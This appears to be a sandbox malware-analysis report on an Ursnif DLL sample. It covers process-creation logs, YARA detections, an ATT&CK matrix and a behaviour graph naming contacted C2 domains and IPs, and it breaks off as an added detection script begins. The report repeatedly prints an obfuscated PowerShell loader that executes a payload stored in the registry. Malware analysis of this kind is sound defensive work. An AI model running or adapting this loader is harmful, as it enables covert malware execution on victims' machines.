            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown
            Source: C:\Windows\System32\control.exe | Process created: unknown unknown
            Source: C:\Windows\System32\control.exe | Process created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1A303 cpuid 4_2_00F1A303
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F13A79 HeapFree,GetSystemTimeAsFileTime,HeapFree,4_2_00F13A79
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F14638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,4_2_00F14638
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1A303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,4_2_00F1A303

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | the same 28 memory dumps and four process memory spaces (loaddll32.exe PID 6360, regsvr32.exe PID 6388, rundll32.exe PIDs 6400 and 6424) listed under Stealing of Sensitive Information above.

Mitre Att&ck Matrix

Listed per tactic (one column of the original matrix per line). Superscript digits are the report's markers for techniques observed in this run (its matched-signature counts); techniques without a superscript are the matrix's unobserved entries.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation², Command and Scripting Interpreter¹, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell
Persistence: DLL Side-Loading¹, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron
Privilege Escalation: DLL Side-Loading¹, Process Injection⁵¹¹, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron
Defense Evasion: Obfuscated Files or Information¹, DLL Side-Loading¹, Masquerading¹, Virtualization/Sandbox Evasion²¹, Process Injection⁵¹¹, Regsvr32¹, Rundll32¹, Indicator Removal from Tools, Masquerading, Invalid Code Signature, Right-to-Left Override
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture
Discovery: System Time Discovery¹, Account Discovery¹, File and Directory Discovery¹, System Information Discovery²⁵, Query Registry¹, Security Software Discovery¹, Virtualization/Sandbox Evasion²¹, Process Discovery², Application Window Discovery¹, System Owner/User Discovery¹, Remote System Discovery¹
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media
Collection: Archive Collected Data¹, Email Collection¹, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium
Command and Control: Ingress Tool Transfer¹, Encrypted Channel¹¹, Non-Application Layer Protocol², Application Layer Protocol¹³, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop

Behavior Graph

Behavior Graph ID: 539457 | Sample: 6.png | Start date: 14/12/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Found malware configuration; Yara detected Ursnif; Machine Learning detection for sample; 5 other signatures.

Process tree recovered from the graph (indentation shows parent/child; contacted hosts, dropped files and per-process signatures are listed under the process they belong to; ports after the colon are the remote port followed by the local source ports):

6.png (start)
  loaddll32.exe
    contacts: windows.update3.com; berukoneru.website; 2 other IPs or domains
    signatures: Writes to foreign memory regions; Writes or reads registry keys via WMI; Writes registry values via WMI
    cmd.exe
      rundll32.exe
        contacts: 3.12.124.139 (AMAZON-02, United States): 443, 49775, 49778; windows.update3.com; 2 other IPs or domains
        signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Writes registry values via WMI
        control.exe
          rundll32.exe
    regsvr32.exe
      contacts: berukoneru.website 79.110.52.144 (V4ESCROW-AS, Romania): 443, 49795, 49796; windows.update3.com; prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 18.219.227.107 (AMAZON-02, United States): 443, 49772, 49773
      signatures: Writes to foreign memory regions; Writes or reads registry keys via WMI; Writes registry values via WMI
      control.exe
    rundll32.exe
      contacts: windows.update3.com
      signatures: System process connects to network (likely due to code injection or exploit)
      control.exe
    BackgroundTransferHost.exe
  mshta.exe
    powershell.exe
      dropped: C:\Users\user\AppData\...\nigogz4l.cmdline (UTF-8)
      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
      csc.exe
        dropped: C:\Users\user\AppData\Local\...\nigogz4l.dll (PE32)
        cvtres.exe
      2 other processes
        dropped: C:\Users\user\AppData\Local\...\dtnsoflb.dll (PE32)
  mshta.exe
    powershell.exe
      csc.exe
        dropped: C:\Users\user\AppData\Local\...\nlbomp32.dll (PE32)
        cvtres.exe
      conhost.exe
  2 other processes
    powershell.exe
      2 other processes
        dropped: C:\Users\user\AppData\Local\...\uu5u2nmv.dll (PE32)
        cvtres.exe
    powershell.exe
      2 other processes
        dropped: C:\Users\user\AppData\Local\...\wklr4juq.dll (PE32)
        cvtres.exe
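
The process chains in the graph above (mshta.exe spawning powershell.exe, which compiles a DLL through csc.exe and cvtres.exe, and regsvr32.exe/rundll32.exe spawning control.exe, which spawns rundll32.exe again) are cheap to detect from process-creation telemetry. The following is an added example written for this page, not code from the Joe Sandbox report: it evaluates those parent/child pairs, plus the csc.exe-from-AppData check that the Sigma hit "Suspicious Csc.exe Source File Folder" stands for, over a constructed event stream. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the PIDs, the Temp subdirectory in the csc.exe command line and the events themselves are constructed, and the sandbox harness loaddll32.exe is deliberately left out of the pair list because it never runs on a real host.

```python
"""Flag the parent/child process pairs seen in this report's behaviour graph
(mshta -> powershell -> csc -> cvtres, and regsvr32/rundll32 -> control -> rundll32)
in a stream of process-creation events.

Added example, not part of the Joe Sandbox report. Field names follow Sysmon
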